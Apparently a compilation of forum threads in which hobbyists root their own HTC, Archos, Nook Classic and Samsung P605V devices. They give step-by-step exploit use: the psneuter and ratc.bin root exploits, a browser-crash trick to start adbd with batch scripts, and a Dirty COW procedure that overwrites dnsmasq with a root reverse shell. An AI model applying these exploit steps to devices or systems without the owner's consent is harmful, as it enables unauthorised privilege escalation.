i ve tried to root my tattoo ; following a long tutorial in unlocker .
applying it exactly didnt come with results ,
even when goldcard my card im still getting that phone logo with upside down rectangle.
any help or way to get latest RUU to update to android 2.2
[GUIDE] All Tattoo questions and answers see here (from A to Z)!
http://forum.xda-developers.com/showthread.php?t=716282
1. How can I root my phone?
1.1 General information/Basic adb-commands
Rooting a phone enables you to do things, which normally aren't possible for the average user like:
- Removing apps which were preinstalled by the provider (like Orange, Vodafone, etc.). My Tattoo had Vodafone apps for buying music and other sh*t, which was installed on the system partition (to which a "normal" user has no rights to write to, including deleting).
The Tattoo was successfully rooted by a bunch of guys here, namely -bm-, mainfram3 and Coburn64 (maybe, I don't remember quite correctly ). Also the Tattoo was the first phone having a security mechanism hindering a user to mount the filesystems as read/write, which had to be overridden by remapping the read only memory region to a read/write one. This is done by the module Tattoo-hack.ko, also made by mainfram3. He also created the first boot.img, which enabled su directly from adb and loading Tattoo-hack directly from boot on.
A few words about adb:
ADB is a tool for communicating from the PC with the mobile phone. For this a service is running on the phone enabling the communication via Terminal Emulator. Here are the most useful adb-commands:
adb push localFileFromPC /path/on/mobilephone
-> pushes a file "localFileFromPC" to a specified location on the phone
adb pull /path/to/file pathFromPC
-> receives a file from the phone and stores it to "pathFromPC"
adb remount
-> This is only possible in custom ROMs, remounts the file system to r/w automatically
adb shell "command"
-> executes "command" and returns to the computer shell
adb shell
-> opens a shell session on the phone (from here on you have to be very careful! Also you can execute now normal linux commands like rm, mv, ls, chmod and so on, but not cp (this can done through busybox)). You will have to use this more often, so get used to it
It's not pretty, but I managed to get the exploit used by Archangel to work on the 2.3.20 firmware. Hopefully someone can think of something to automate this process, or knows of a better way to do this.
I believe what Archos is doing is simply restricting your ability to execute the Archangel application in the required directories, with the addition of the psneuter exploit, you can get around this.
This exploit requires that you have ADB setup, the Archangel APK, and the psneuter exploit.
Create a folder on your computer titled archosroot (or anything you would like)
Download Archangel from http://forum.xda-developers.com/showthread.php?t=928767 rename the apk to zip and extract the files.
From the extracted files navigate to "res" then to "raw"
In this folder copy "ls" and "su" to your "archosroot" folder
Download psneuter from http://www.thinkthinkdo.com/trac/project1/attachment/wiki/psneuter/psneuter.zip and extract the files.
Copy the extracted psneuter to your "archosroot" folder.
Enable USB Debugging on your Archos, and connect it to your computer with USB.
From a command prompt, navigate to the directory ADB is installed in.
Verify that the device is connected by running
adb devices
Your archos should be listed, if not please refer to the forum on how to setup ADB for the archos
Once your archos is detected run the following commands.
adb push pathto\archosroot\psneuter /data/local/tmp
(replace pathto with the location your archosroot folder is in, for example c:\archosroot\psneuter)
adb shell chmod 777 /data/local/tmp/psneuter
adb shell /data/local/tmp/psneuter
This may take a few moments
Copy ls and su to your sdcard
adb push pathto\archosroot\ls /sdcard
adb push pathto\archosroot\su /sdcard
Connect to the shell
adb shell
move ls and su to /tmp
mv /sdcard/ls /tmp/
mv /sdcard/su /tmp/
Execute the ls exploit
/tmp/ls 0x62c7a315 0x260de680
Install the superuser application from the market (if you don't already have it)
You should now be able to run su to get root access from a terminal.
Note 1: I was previously rooted with archangel so I already had these files, I have not tried without the files being installed at all, however since this is only a temp root, the process should be the same.
Note 2: I was not able to get Titanium Backup to work, it could be the psneuter exploit prevents the application from properly requesting the right permissions.
This is good, but you should post this in the developer sup-forum
its too hard to do this for beginners
Thanks! It's very simple instruction, will try it today. As easy as install Urukdroid.
I postponed to upgrage to 2.3.20 just due to lack of root method without SDK.
I need the root just for copy some scripts to \system\bin
this has already been done in the following thread with perm root.
http://forum.xda-developers.com/showthread.php?t=897877
Firmwares have already been made that include overclock as well, the first post reveals all.
cool.
the_Danzilla , the way you pointed to requires SDE installation. I don't want to use SDE.
Inciner8Fire said:
Download psneuter from http://www.thinkthinkdo.com/trac/project1/attachment/wiki/psneuter/psneuter.zip and extract the files.
Copy the extracted psneuter to your "archosroot" folder.
Enable USB Debugging on your Archos, and connect it to your computer with USB.
From a command prompt, navigate to the directory ADB is installed in.
Verify that the device is connected by running
adb devices
Your archos should be listed, if not please refer to the forum on how to setup ADB for the archos
Once your archos is detected run the following commands.
adb push pathto\archosroot\psneuter /data/local/tmp
(replace pathto with the location your archosroot folder is in, for example c:\archosroot\psneuter)
adb shell chmod 777 /data/local/tmp/psneuter
adb shell /data/local/tmp/psneuter
Click to expand...
Click to collapse
From what I can read psneuter is a root exploit for the adbd service. So you don't need archangel to complete the root.
Can you verify what user adbd is running after you execute psneuter.
adb shell whoami
The other thing that is mentioned in the first lines of the source code of psneuter is that it effectively disables reading the settings this will probably affect a lot of programs and probably is the reason Titanium backup is not working. So this method is effectively useless to have a working root.
wdl1908 said:
From what I can read psneuter is a root exploit for the adbd service. So you don't need archangel to complete the root.
Can you verify what user adbd is running after you execute psneuter.
adb shell whoami
The other thing that is mentioned in the first lines of the source code of psneuter is that it effectively disables reading the settings this will probably affect a lot of programs and probably is the reason Titanium backup is not working. So this method is effectively useless to have a working root.
Click to expand...
Click to collapse
I was doing some more looking and you are right that because of breaking the settings this is not a good long term root.
However I would not call it useless, since you should be able to manually back up an application.
Perhaps the property file that this setting is in can be modified with this, so that it can be rooted using a more standard method.
Not sure what I did, but I was able to get root with the properties intact.
My archos had froze today and I was forced to power it off so I know the properties were no longer be neutered. I was looking at some of the properties files and for the heck of it I tried running su from a terminal, and it worked.
I opened Titanium backup and it prompted for root permissions.
Perhaps something about the forced power cycle?
I found out that when I connect to a wireless network (as required by archangel) if the disable network shares option is chosen it's not possible to root.
However it would appear that if you connect and don't select this option Archangel will still work.
I suppose there could be something else I did without realizing it, but this has worked after rebooting 5 times so far.
I know that this is for second edition but I don't seen a forum for the first edition so this seems to be the closest match. Anyway I am trying to root my Nook Classic (the one with a E-ink display on the top and color touch screen on the bottom). I am following the instructions on nookdevs for rooting the Nook Classic on all hardware and firmware versions (I can't post the link here as I am new but PM me and I can pass it that way if you need). The method is that sometimes when the web browser browses a certain type of website it crashes and sometimes starts adbd and you can connect adb at that point.
I have managed to get adb to connect, pull the init.rc file, make the needed change, but when I try to push the ratc.bin file adb says it goes though but then the second command $ cd /sqlite_stmt_journals (after starting adb shell) says it is not found. So I can't go any further. ratc.bin is what gives root access long enough to push the init.rc back and without being able to run that, well I am up a creek.
Any ideas?
dob43 said:
I know that this is for second edition but I don't seen a forum for the first edition so this seems to be the closest match. Anyway I am trying to root my Nook Classic (the one with a E-ink display on the top and color touch screen on the bottom). I am following the instructions on nookdevs for rooting the Nook Classic on all hardware and firmware versions (I can't post the link here as I am new but PM me and I can pass it that way if you need). The method is that sometimes when the web browser browses a certain type of website it crashes and sometimes starts adbd and you can connect adb at that point.
I have managed to get adb to connect, pull the init.rc file, make the needed change, but when I try to push the ratc.bin file adb says it goes though but then the second command $ cd /sqlite_stmt_journals (after starting adb shell) says it is not found. So I can't go any further. ratc.bin is what gives root access long enough to push the init.rc back and without being able to run that, well I am up a creek.
Any ideas?
Click to expand...
Click to collapse
>> http://www.mobileread.com/forums/forumdisplay.php?f=209
>> http://www.the-ebook.org/forum/viewforum.php?f=44&sid=e250da1c3a4967da22dae8ca2d104ac8
Thanks osowiecki, I did find a thread on Mobile read shortly after I posted this. The other is non-english I am afraid, and sadly I only speak english.
Anyway I did mange to root my nook today. And I am posting here as I hope it will help someone in the future:
Yessssssssssssssss! I finally hacked my Nook Classic (Nook First Edition called by some)! I followed most of the instructions at http://nookdevs.com/Rooting_B&N_revision_1.4_to_1.7_on_any_hardware
I only tweeked in a few places. Here is a general list of what I did:
1. Look at the site above and grab the linked file (ratc.bin). Then go to this thread http://forum.xda-developers.com/showthread.php?t=1474956 and at the top there grab the adb + fasboot + drivers.zip. The reason I used this is because it is much smaller than the full Andriod SDK (which is over 500mb btw) and I figured this would work since it works for Nook Tablets. I didn't install the drivers or anything though. Just used adb.
2. Went with nook browser to http://nookadb.suspended-chord.info/ to crash the browser. If this should ever be down I see on the nookdevs page there is a discussion with the code that is on the crash page so you can put it on any web server and still do this procedure.
3. Once it crashed I went to cmd (comand prompt) and navigated to the folder that had the adb package I downloaded and decompressed earlier. I suggest putting this folder on your desktop for easy use. I gave the command
adb connect yournookip:5555 please note that the nookdevs instructions are not specific in that you NEED the :5555 after the IP. If it doesn't connect, keep crashing the browser by going to that page until it connect.
4. extracted the init.rc file with the command
adb pull /init.rc then edited as per the instructions on nookdevs
5. Now here is where things are different. I tried to push the ratc.bin file and while that seemed to work the commands after it didn't. It would keep saying the file wasn't there. I was cut and pasting the commands direct from the website so I don't think that was the issue. So what I did was grab the bat file at www.mobileread.com/forums/showthread.php?t=121655&page=2 by Jackr and edit it slightly removing the bit about location of adb and placed the bat in the same folder as adb on my desktop and ran it.
6. This actually worked and the bat prompted me to crash the browser again. I kept trying it took a while but as soon as I did it pushed the modifyed init.rc to the nook. The another reason why I think the bat/script is important as my nook totally froze a second after I crashed it. I think that if I was trying to paste that command manually after connecting I would still be trying lol.
7. After reboot I was fully rooted and I installed a bunch of apps from nookdevs using adb. Just make sure the apk (app file) is in the same directory as adb and use the command install nameofapp.apk
8. If you want to use nookmarket app to install files by itself then you need to:
adb connect nookIP:5555
adb shell
then type this after the #
/system/xbin/sqlite3 /data/data/com.android.providers.settings/databases/settings.db "update secure set value=1 where name='install_non_market_apps'"
It will allow nookmarket to install apps on the fly over the net. If you ever want to turn it back off just change the value=1 to value=0 in the above command. Of course you can always use adb, but it can be handy.
Of all the apps I would definitely suggest Nooklibary and wifilocker along with Nooksync. There are several other good nook apps such as trook. Oh I should also mention that Nook Browser still works fine. I think using the batfile/script helped with that situation.
I hope this helps someone who is thinking of taking the plunge (and trying to find out HOW). I wouldn't have bothered if B&N actually continued to update the Nook Classic and add the features that we BEGGED for (and are in NookLibrary). Instead of spending time adding things we didn't like games.
I've tried a thousand times, but always get "failed to copy 'init.rc' to '//init.rc': Permission denied" so RATC must not be working. And I'm on mac, so no bat. Any ideas?
lolbutts said:
I've tried a thousand times, but always get "failed to copy 'init.rc' to '//init.rc': Permission denied" so RATC must not be working. And I'm on mac, so no bat. Any ideas?
Click to expand...
Click to collapse
I would suggest looking at the bat, and creating the equivalent in apple script. If I remember right Mac's still have that option. Another option would be to run say WinXP in emulation (with virtual box for example) and do it that way.
How to root the original Nook tablet (model number: BNRZ100)
dob43 said:
Yessssssssssssssss! I finally hacked my Nook Classic (Nook First Edition called by some)! I followed most of the instructions at http://nookdevs.com/Rooting_B&N_revision_1.4_to_1.7_on_any_hardware
Click to expand...
Click to collapse
Okay, since nookdevs.com has apparently been down for sometime now, I was checking out the mobileread.com link that was shared above and found out the info that I have been searching for to find out how to root the Nook. Be forewarned that I have not tried this yet, but I am about to, and afterwards I will post the results, I am just posting it as sort-of a guide for myself and anyone interested at this point. I will edit this post accordingly once I am successfully rooted.. Please see below for links / details.
Disclaimer: I am not responsible for any damage that is done by you to your Nook, either physically or otherwise. I am just showing you what I have researched and if you choose to follow these directions it is at your own risk.
Which Nook Device Do You Have?
click here to find out:
http://glyde.com/glydecast/how-to/which-nook-do-you-have/
Remember, this is for the first generation only (model number: BNRZ100)
Here is a visual aid that will help you find the SD card that you need to look for once you get the Nook opened up (yes, you will need to open your Nook and access the motherboard):
http://www.wired.com/2009/12/nook-torn-open-hacked-and-rooted/
How to open the Nook up:
https://www.youtube.com/watch?v=GEDqiNiQFHk
Hint: you don't need to take to front panel / bezel off, just the back section because all we need is access to the motherboard to be able to remove the internal SD card, which contains the file that we will be editing.
Finally, the info that you need to root the device (also posted below the link for quick reference, and just in case the link gets broken):
http://www.mobileread.com/forums/showthread.php?t=128210
How to root the Nook, after you figute out how to open it up:
Just you need a microSD Card reader + Linux (any linux ) !
just you should remove the System file MicroSD ( which is inside the Nook )
put it in your PC , change the "init" file with Any txt editor !
just find "service adbd /sbin/adbd" and change the "disable" to "enable" ...
you are done !
Wow I had no idea that Nookdevs went down. Thankfully I did archive all the information on that page. While the method you mentioned is great, and the best, only the earliest nook classic's had removable system SD cards. After the first batch they were soldered chips instead.
With that in mind I am posting what was contained in the link I posted before on NookDevs since it is not available on the internet archive.
------------
This method of rooting is known to work on B&N firmware revisions 1.4-1.7, on all hardware versions. Unlike the other rooting methods, this one involves an element of luck -- it takes advantage of a memory-corrupting bug in the web browser, and its success depends on the current contents of the memory which depends on more variables than we can control. As such, the method requires a little bit of (or more) patience. Warning: After this root is completed, the web browser will be irreversibly damaged.
Contents
1 Preparation
2 Enable adbd on the Nook
3 Pull and modify /init.rc
4 Getting root access
4.1 Keeping root access
5 Your rooted Nook
6 Notes
Preparation
Install Google's Android platform tools from developerdotandroiddotcom. These include many useful utilities, such as the ADB control software.
Open up a terminal to use ADB
Open a command prompt
Navigate to the directory that you installed, then go into the platform-tools subdirectory. This is where the adb executable lives.
Connect your nook to the same WiFi that your computer is on. You need direct (non-firewalled) access to the Nook's IP address to connect via ADB.
Find your Nook's IP address (How to find our your nook's IP address)
Write it down somewhere.
Enable adbd on the Nook
This is the luck portion of the root. adbd is the other half of ADB: ADB runs on your computer, and tries to connect with adbd on the nook. Once connected, you can issue commands, shuffle files, and install applications. Our final goal is to be able to start and stop adbd at will[1].
Open the Nook's web browser and navigate to the web site nookadb.suspended-chord.info. You may want to bookmark the page for a quicker access.
When you load this web page, the browser will crash. (It may automatically reload itself a few times first.) After it crashes, it might enable adbd.
Go back to the command prompt on your computer, and type:
adb connect <nook's IP>
One of two things will happen:
You will get the message unable to connect to <ip address>:5555.
In this case, restart your web browser and load the web page again (from the history or the bookmark). You may have to do this a dozen times or more, so keep at it!
You will get the message connected to <ip address>:5555.
Success!
At this point you have (temporarily) access the nook via ADB, can now enter commands on your PC for the Nook, and can move files back and forth. If you reboot the nook, adbd (the nook companion to ADB) will not be running.
Pull and modify /init.rc
If this isn't your first time through, and you have a modified copy of init.rc, skip this step.
Now that you can connect into the Nook, you will want to pull and edit the /init.rc file. This file is run when the nook turns on, and includes an option to enable adbd (disabled by default). Download the file to your PC with:
adb pull /init.rc
Open this file with Notepad (or a different plain text editor), and find the part the lines:
service adbd /sbin/adbd
disabled
Change 'disabled' to 'enabled' and save the file.
Getting root access
You got the web browser to launch adbd, but you only have the privilege level of the web browser's user - system. To install software and to start adbd when the Nook reboots, you need root access. Rage Against the Cage will give you root access. Next, you'll restart adbd, and push the modified init.rc back to the nook. After that, reboot the nook and you're done!
Download [ratc.zip].
Extract it to the same directory that adb is stored in, then go back to the command prompt:
adb push ratc.bin /sqlite_stmt_journals
adb shell
$ cd /sqlite_stmt_journals
$ /system/bin/chmod 777 ./ratc.bin
$ ./ratc.bin
(several lines of output follow -- don't do anything, a few seconds later adb will disconnect you.)
Keeping root access
If everything went well, you should have root access on the Nook. However, the Nook is now relatively unstable and may stop working at any point, so work quickly!
The nook may crash - just reboot, then restart the process from scratch. (Remember, you don't need to pull init.rc again.)
First, you need to stop your PC's ADB server. It still thinks that it's connected to the nook.
adb kill-server
Second, you need to re-establish the connection with adbd on the nook and then push init.rc file. You can do this by typing these commands[2]:
adb connect <nook IP>
adb push init.rc /
Perform the browser crash procedure again. After each attempt, check if the computer successfully transferred init.rc. If it did, you're done!
If the nook crashes before the transfer completes (so you are not able to connect to your nook), go back to "Enabling adbd on the Nook". You can skip "Pull and modify /init.rc", but do the other steps.
If the adb push gives a permission denied error, redo the "Getting root access", and try again. You may have to do this quite a few times until the whole process succeeds.
Your rooted Nook
Assuming everything worked, you now have a rooted Nook with adbd running on reboot, with root access. You should be able to establish the connection with adbd on the nook without jumping through any other hoops.
What's next? Browse the applications, and install to your heart's content.
Suggestions:
Mynook.ru Launcher A polished replacement launcher. You must replace the launcher to access additional applications with the nook.
Trook A RSS feed reader for the nook, and much more! It can install applications, too. Just go into the nookdevs feed.
NookLibrary A replacement library for the nook. If unifies sideloaded books with Barnes & Noble content, and offers other improvements.
NookMarket A program that allows you to easily install everything on nookdevs. Trook offers more functionality (imho)
Games There are a few games on the applications page.
Notes
↑ There's also a Python script to automate the process: root-nook-eink.tar.xz (Updated Jun 6 , 2011)
↑ You may want to run a script that automatically issues the following commands, reducing the chances of the nook crashing before init.rc has been pushed to it. In this case, extract this [batch file] to the same directory as ADB. Run it by typing:
push.bat
It will prompt you for your nook's IP address, then try connecting. Every few seconds, ADB will complain that it can't connect to the nook. Let's fix that.
------------------------------------------------
The above is from Nookdevs.com and I did not write it I am only posting it here as the site has went down.
I am also posting the html file that is needed to do this (although here it is in txt format). If the the site listed above ever dies you can put this on a website somewhere to use it. And the ratc.bin file needed.
And finally I am adding the apps that make rooting the nook classic worth while. The improved library definitely. Which btw are two parts, the library app and the nooksync which enables you to download from B&N directly. Otherwise you need to use the normal nook library app to download then you can read with the nookdev version. I am not sure which version of the library works best, been a while since I installed it so I included both.
Also wifilocker is great to turn wifi on/off not to mention lock it and keep the nook from going to sleep while you are connected to adb. I definitely suggest installing that as well. The others are handy. Trook can connect to calibre and download books from your desktop. The nook browser is a improved web browser for nook classic, although I never really bothered with it.
Nook notes is good for quick little notes when you don't have any other device handy. Txt reader reads txt files, not the best but it is handy. Personally I just make epubs of anything with calibre. But if you don't want to bother making a epub first, this is handy.
Hope this helps someone!
I downloaded files and rat.bin has malware in it.
I also have hard time understanding the ones that are explained above. Is there any easier way to do it? Does anybody have a good tutorial video or "fool-proof" instruction on this? I have Nook classic wifi version.
I would like to read kindle books on nook as well as the nook books. Is this even possible on this model?
Thanks for the help
kidollt said:
I downloaded files and rat.bin has malware in it.
I also have hard time understanding the ones that are explained above. Is there any easier way to do it? Does anybody have a good tutorial video or "fool-proof" instruction on this? I have Nook classic wifi version.
I would like to read kindle books on nook as well as the nook books. Is this even possible on this model?
Thanks for the help
Click to expand...
Click to collapse
Er of course rat.bin would be flagged as malware, because technically it is. You are hacking a system that is designed not to let you in. But in this case all rat.bin will do is let you in so you can get root of your own device, nothing else. No back doors for anyone else or making your device do odd things.
The problem you are having is not using rat.bin, without that you might as well not try. I also only managed to do it with a BAT file so that it would keep trying to push the init.rc RIGHT AFTER the rat.bin was used. Generally you can't type fast enough to do the push. The window of opportunity is very very small.
This does work but is tricky as the window of opportunity is very small. I tried for hours trying to get it to work, then I used the BAT file to make the push automatic and on the second try it worked. Rooting the Nook Classic is the toughest device to root that B&N made. If you have one of the really early models that has a removable internal SD card then you can pull that, made modifications (install a old version of the ROM, make a modification to init.rc), and reinstall the SD card. I forget the serial numbers of the models that this worked with, but I do know it was the first batch of Nooks B&N made. If you got yours after the first Christmas, then it is likely it doesn't have a internal SD card that you can remove. Later on they soldered them to the board.
As for reading kindle books, no. There isn't a mobi reading app that I have found, let alone kindle books with DRM. The better bet is to use Calibre calibre-ebook.com to convert your kindle books to epub. But they can't be encrypted/DRM. If they are, then you have to remove that. There are scripts for Calibre that can do it for nook and kindle. I use calibre to convert my mobi/kindle books to epub then side load them. Another benefit of rooting a nook classic, you can then browse and download wireless from your calibre library with the took app. Although I never bothered and just did the transfers via USB.
Hi!
I would like to ask for help in this case:
I followed all the instructions here, however for some reasons I wanted to install this app first using the command "adb push Home.apk /system/app" pushing the app found here: Github
Now it turns on/off, shows "Home", batter and time at the top bar, but everything else is black both the Eink screen and the touchscreen as well.
It does not connect to wifi automatically so I can't connect via ADB to switch back to the original Home apk
Please help me, what should I do?
Is 1.7 software not rootable?
I can't get adb to come on, no matter how many browser crashes I do. Even wrote a script for it:
@echo off & setlocal
set IP=192.168.0.119
set loopcount=0
set s
:loop
set /a loopcount=loopcount+1
echo Connecting %loopcount% time...
adb connect %IP% | find /i "connected to" > %s
if errorlevel 1 (
echo Not successful + %ERRORLEVEL% + %s%
goto loop
) else (
echo Successful + %ERRORLEVEL% + %s%
adb shell
goto exitloop
)
:exitloop
pause
Click to expand...
Click to collapse
Is OTA rooting (by redirect on sync.barnesandnoble.com) not possible any longer as well?
Sorry for the late response, for some reason the email telling me there was a post here just arrived TODAY lol.
It should be, I did it with 1.7. The script I have I modded a little from another one I found online here is mine:
Code:
@echo off
echo The website hack seems to work on the round right after it has an instant crash.
echo.
adb kill-server
adb start-server
set /p ip=Enter the IP here.
:CON
cls
echo Crash the browser.
echo.
adb connect %ip%
for /f "tokens=2" %%A in ('adb devices') Do (Set dev=%%A)
if %dev%==device goto INT
echo.
goto CON
:INT
if exist ratc.bin (set f1=1) else (set f1=0)
if exist init.rc (set f2=1) else (set f2=0)
if %f1%==%f2% (if %f1%==1 (goto RTT) else (goto 2fi)) else (goto 2fi)
:2fi
if %f1%==0 (echo "The ratc.bin file is not in the %cd% directory.") else (echo Ratc.bin file present.)
echo.
if %f2%==0 (echo "The init.rc file has not been pulled from the device to the %cd% directory, pulling now.") else (echo Init.rc file present.)
if %f2%==0 adb pull /init.rc
echo.
echo Please add the required files and restart this batch. If init.rc was just pulled, you will need to modify the file.
cmd
:RTT
adb push ratc.bin /sqlite_stmt_journals
adb shell cd /sqlite_stmt_journals
adb shell /system/bin/chmod 0777 /sqlite_stmt_journals/ratc.bin
adb shell /sqlite_stmt_journals/ratc.bin
adb kill-server
adb start-server
goto CO2
:CO2
cls
echo Re-crash the browser.
echo.
adb connect %ip%
for /f "tokens=2" %%A in ('adb devices') Do (Set dev=%%A)
if %dev%==device goto PSH
echo.
goto CO2
:PSH
adb push init.rc /
adb shell reboot
echo.
echo Congrats! The device is now rooted.
echo.
cmd
It is RANDOM on the browser crashes. Sometimes it happens fast, another time it look me a hour or two to get a good crash and root the nook. Also if it doesn't seem to be doing it for a long time, try rebooting the nook (hold down the power until the screen blanks then press the button again to restart it). In my opinion, this is the toughest Nook to root, but definitely worth it. Especially now that B&N ended support some time ago. Also make sure the ADB, this script, and the ratc.bin is in the same folder. I used a folder on the desktop as it made it much easier/faster to get to. Also after you get the init.rc and modded, that should be in the same folder as well.
As for OTA rooting, I have no idea if it will work or not. I never used that method. But if it depended on any sort of connection from B&N, I doubt it will work now since they have abandoned the Nook classic.
If you need any of the nook apps that were on the nook developer site let me know. I downloaded all the apps before the site went down.
dob43 said:
Sorry for the late response, for some reason the email telling me there was a post here just arrived TODAY lol.
It should be, I did it with 1.7. The script I have I modded a little from another one I found online here is mine:
Code:
@echo off
echo The website hack seems to work on the round right after it has an instant crash.
echo.
adb kill-server
adb start-server
set /p ip=Enter the IP here.
:CON
cls
echo Crash the browser.
echo.
adb connect %ip%
for /f "tokens=2" %%A in ('adb devices') Do (Set dev=%%A)
if %dev%==device goto INT
echo.
goto CON
:INT
if exist ratc.bin (set f1=1) else (set f1=0)
if exist init.rc (set f2=1) else (set f2=0)
if %f1%==%f2% (if %f1%==1 (goto RTT) else (goto 2fi)) else (goto 2fi)
:2fi
if %f1%==0 (echo "The ratc.bin file is not in the %cd% directory.") else (echo Ratc.bin file present.)
echo.
if %f2%==0 (echo "The init.rc file has not been pulled from the device to the %cd% directory, pulling now.") else (echo Init.rc file present.)
if %f2%==0 adb pull /init.rc
echo.
echo Please add the required files and restart this batch. If init.rc was just pulled, you will need to modify the file.
cmd
:RTT
adb push ratc.bin /sqlite_stmt_journals
adb shell cd /sqlite_stmt_journals
adb shell /system/bin/chmod 0777 /sqlite_stmt_journals/ratc.bin
adb shell /sqlite_stmt_journals/ratc.bin
adb kill-server
adb start-server
goto CO2
:CO2
cls
echo Re-crash the browser.
echo.
adb connect %ip%
for /f "tokens=2" %%A in ('adb devices') Do (Set dev=%%A)
if %dev%==device goto PSH
echo.
goto CO2
:PSH
adb push init.rc /
adb shell reboot
echo.
echo Congrats! The device is now rooted.
echo.
cmd
It is RANDOM on the browser crashes. Sometimes it happens fast, another time it look me a hour or two to get a good crash and root the nook. Also if it doesn't seem to be doing it for a long time, try rebooting the nook (hold down the power until the screen blanks then press the button again to restart it). In my opinion, this is the toughest Nook to root, but definitely worth it. Especially now that B&N ended support some time ago. Also make sure the ADB, this script, and the ratc.bin is in the same folder. I used a folder on the desktop as it made it much easier/faster to get to. Also after you get the init.rc and modded, that should be in the same folder as well.
As for OTA rooting, I have no idea if it will work or not. I never used that method. But if it depended on any sort of connection from B&N, I doubt it will work now since they have abandoned the Nook classic.
If you need any of the nook apps that were on the nook developer site let me know. I downloaded all the apps before the site went down.
Click to expand...
Click to collapse
Does this still work? I recently dug up my old nook 1st edition, I tried the website and it didn't crash my browser, it just sat there forever loading.. I looked at the site, now it's using TLS 1.3, but old nook 1st edition is stuck with TLS 1.2... I tried for many hours just couldn't "crash" the web browser at all...
Further research proves this has been done before, although perhaps not on our device. While root in a technical sense, it's severely SElinux-limited & thus not of significant utility as it is. I've made some inroads re. patching init going toward full root, but nothing certain yet. Either way, what exists should be enough to get us to an unlocked bootloader if we can get our hands on the right CID & aboot.
------
This is how I achieved temproot on the P605V. This is not a permanent root as, since our tablets run a Samsung eMMC and are/should be vulnerable to the eMMC bug, if we have the right CID and aboot & if my understanding is correct, we can convert these to developer units and unlock their bootloader!
What this basically does is downgrade to a dirtycow-vulnerable kernel & launch a temporary root shell. At the moment it can't do much as it runs within dnsmasq's SElinux context, but it's a start.
This does not apply if you're on 4.4.2, there are probably better rooting methods then. Do not upgrade to 5.1.1 in that case as you will burn fuses and will be unable to downgrade back to 4.4.2.
However, we can still crossflash between 5.1.1 versions! For our tablet, there are two: P605VVRSDPL1 (latest, patched) and P605VVRUDOH2 (earlier, unpatched). You must downgrade to P605VVRUDOH2. You will need the P605VVRUDOH2 tar.md5 and Odin - this is covered extensively for every Samsung device (including the non-VZW version of ours) so I will not repeat it here.
Once you're on P605VVRUDOH2, go through the initial setup, enable Developer Tools, then enable ADB.
The manual process (compiling from source):
Spoiler
You will need to obtain the following (on Linux, not tested on Windows):
- the Android 22 NDK
- https://github.com/timwr/CVE-2016-5195
- https://github.com/freddierice/trident
0. If you don't yet have it installed, install the Android NDK. I don't usually compile for Android, so I installed Android Studio from https://developer.android.com/studio/#downloads and added NDK 22 from its menus. You can likely (and perhaps should) use an earlier NDK, such as 14 or 15. Your mileage may vary.
1. Extract CVE-2016-5195 and trident
2. In CVE-2016-5195, rename 'run-as.c' to 'old-run-as.c'
3. Copy 'reverse.c' from trident into CVE-2016-5195
4. In CVE-2016-5195, rename the copied 'reverse.c' to 'run-as.c' - we're basically replacing the original payload from CVE-2016-5195 with a reverse shell from trident
5. Edit the Makefile and replace the 'root: push' section as follows:
root: push
adb shell 'chmod 777 /data/local/tmp/dcow'
adb push libs/$(ARCH)/run-as /data/local/tmp/run-as
adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/dnsmasq'
6. Run 'make root'
7. On the tablet, go into Settings -> More networks -> Mobile Hotspot, and turn it on. You will need a SIMcard to do this, any SIM will do - even if the device is still Verizon-locked. As we've written our reverse root shell spawning code into dnsmasq, and dnsmasq as root, our shell will run as root as well!
8. Verify it worked by running 'adb shell' and running 'netstat' - you should see a process listening on 0.0.0.0:4040. That's our shell! If you run 'ps' you should also see /system/bin/dnsmasq followed by /system/bin/shell, both running as root.
9. Run 'adb forward tcp:4040 tcp:4040'
10. Run netcat to connect to the shell: 'nc localhost 4040' (on Windows, you can get a precompiled netcat binary from http://nmap.org/dist/ncat-portable-5.59BETA1.zip )
11. Profit!
The precompiled process (easier, binaries attached to this post):
Spoiler
1. Download and unzip the attached package.
2. Open up a shell/command prompt, change into the directory you unzipped the files into, and run:
adb push dcow /data/local/tmp/dcow
adb push rshell /data/local/tmp/rshell
adb shell 'chmod 777 /data/local/tmp/*'
adb shell '/data/local/tmp/dcow /data/local/tmp/rshell /system/bin/dnsmasq'
3. On the tablet, go into Settings -> More networks -> Mobile Hotspot, and turn it on. You will need a SIMcard to do this, any SIM will do - even if the device is still Verizon-locked. As we've written our reverse root shell spawning code into dnsmasq, and dnsmasq as root, our shell will run as root as well!
4. Verify it worked by running 'adb shell' and running 'netstat' - you should see a process listening on 0.0.0.0:4040. That's our shell! If you run 'ps' you should also see /system/bin/dnsmasq followed by /system/bin/shell, both running as root.
5. Run 'adb forward tcp:4040 tcp:4040'
6. Run netcat to connect to the shell: 'nc localhost 4040' (on Windows, you can get a precompiled netcat binary from http://nmap.org/dist/ncat-portable-5.59BETA1.zip )
7. Profit!
Keep in mind, this is only temporary; a reboot will clear it and you'll have to exploit again. It is also not an extensive root as my end goal is to unlock the bootloader and get rid of the (awful) stock firmware.
Credits to timwr and all involved in the dirtycow exploit, freddierice for trident, as well as everyone on XDA whose research and comments over the past 4 years pointed me in the right direction. This tablet is still quite decent in 2020/2021, it deserves to be "free"!
----
As I understand it, as per @beaups https://github.com/beaups/SamsungCID & SamDunk, we will need two things - I hope someone in the community will volunteer these!
1. A dev-edition CID
2. An aboot dump from a dev-edition P605V (I'm not sure the regular P605 will work)
@ryanbg has made much inroad here as well. All input/assistance is appreciated!
Should these turn out to be unobtainium in some time, I will look into a permanent root solution.